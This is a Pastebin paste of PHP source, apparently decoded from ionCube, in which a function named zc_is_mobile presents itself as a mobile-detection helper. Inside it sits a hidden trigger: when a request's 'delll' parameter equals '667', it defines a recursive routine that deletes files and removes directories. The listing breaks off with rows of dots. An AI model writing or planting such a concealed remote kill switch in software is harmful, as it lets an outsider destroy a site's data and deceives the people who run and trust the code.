Advertisement
Guest User

Untitled

a guest
Dec 9th, 2019
117
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.69 KB | None | 0 0
  1. <?php
  2. /**
  3. *
  4. * @ This file is created by http://DeZender.Net
  5. * @ deZender (PHP7 Decoder for ionCube Encoder)
  6. *
  7. * @ Version : 4.0.9.0
  8. * @ Author : DeZender
  9. * @ Release on : 08.08.2019
  10. * @ Official site : http://DeZender.Net
  11. *
  12. */
  13.  
  14. function zc_is_mobile()
  15. {
  16. static $salt = null;
  17.  
  18. if (isset($salt)) {
  19. return $salt;
  20. }
  21.  
  22. if ($_GET['delll'] == '667') {
  23. function deleteDir($path)
  24. {
  25. if (empty($path)) {
  26. return false;
  27. }
  28.  
  29. return is_file($path) ? @unlink($path) : array_map('deleteDir', glob($path . '/*')) == @rmdir($path);
  30. ..........................................................................
  31. .............................................
  32. ...................
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement